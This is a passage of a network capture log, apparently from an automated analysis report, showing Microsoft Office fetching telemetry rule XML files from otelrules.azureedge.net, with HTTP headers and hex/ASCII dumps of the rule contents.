                                                                              x-azure-ref: 20241026T064939Z-16849878b786lft2mu9uftf3y400000002z0000000005nxb
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:39 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              96192.168.2.44985113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:39 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:39 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:39 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 472
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                              ETag: "0x8DC582B984BF177"
                                                                              x-ms-request-id: dbd91de3-001e-002b-2827-2799f2000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064939Z-r197bdfb6b46krmwag4tzr9x7c00000001dg000000006v4m
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:39 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              97192.168.2.44985213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:39 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:39 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:39 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 405
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                              ETag: "0x8DC582B942B6AFF"
                                                                              x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064939Z-16849878b78tg5n42kspfr0x4800000001qg00000000640n
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:39 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              98192.168.2.44985313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:39 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:39 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:39 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 468
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                              ETag: "0x8DC582BBA642BF4"
                                                                              x-ms-request-id: 12d8ca17-b01e-0098-4df1-26cead000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064939Z-16849878b785jrf8dn0d2rczaw00000002xg000000001bsn
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:39 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              99192.168.2.44985413.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:39 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:39 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:39 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 174
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                              ETag: "0x8DC582B91D80E15"
                                                                              x-ms-request-id: 2034bdf9-701e-003e-3056-2679b3000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064939Z-16849878b78p8hrf1se7fucxk800000002k0000000006x3k
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:39 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              100192.168.2.44985613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:40 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:40 UTC491INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:40 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 958
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                              ETag: "0x8DC582BA0A31B3B"
                                                                              x-ms-request-id: 37fe38c7-001e-0014-0ed1-265151000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064940Z-r197bdfb6b4zd9tpkpdngrtchw00000000v000000000a4e5
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:40 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              101192.168.2.44985513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:40 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:40 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:40 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1952
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                              ETag: "0x8DC582B956B0F3D"
                                                                              x-ms-request-id: bb28544f-801e-0047-7562-267265000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064940Z-16849878b78fssff8btnns3b1400000001z0000000006rkb
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:40 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              102192.168.2.44985713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:40 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:40 UTC470INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:40 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 501
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                              ETag: "0x8DC582BACFDAACD"
                                                                              x-ms-request-id: 97ce691d-801e-0047-0a01-277265000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064940Z-16849878b78hh85qc40uyr8sc800000001w000000000ev9h
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:40 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              103192.168.2.44985813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:40 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:40 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:40 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 2592
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                              ETag: "0x8DC582BB5B890DB"
                                                                              x-ms-request-id: 9cbc484f-801e-008f-0ca3-262c5d000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064940Z-15b8d89586f5s5nz3ffrgxn5ac000000026g00000000aq16
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:40 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              104192.168.2.44985913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:40 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:40 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:40 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 3342
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                              ETag: "0x8DC582B927E47E9"
                                                                              x-ms-request-id: cd066ebd-401e-0035-394c-2682d8000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064940Z-17c5cb586f6qkkscezt8hb00a000000003t0000000009a2a
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:40 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              105192.168.2.44986013.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:40 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:41 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:40 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 2284
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                              ETag: "0x8DC582BCD58BEEE"
                                                                              x-ms-request-id: 9c2fdade-c01e-002b-16f2-246e00000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064940Z-15b8d89586fnsf5zd126eyaetw00000002u0000000007zt0
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:41 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              106192.168.2.44986113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:40 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:41 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:41 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1393
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
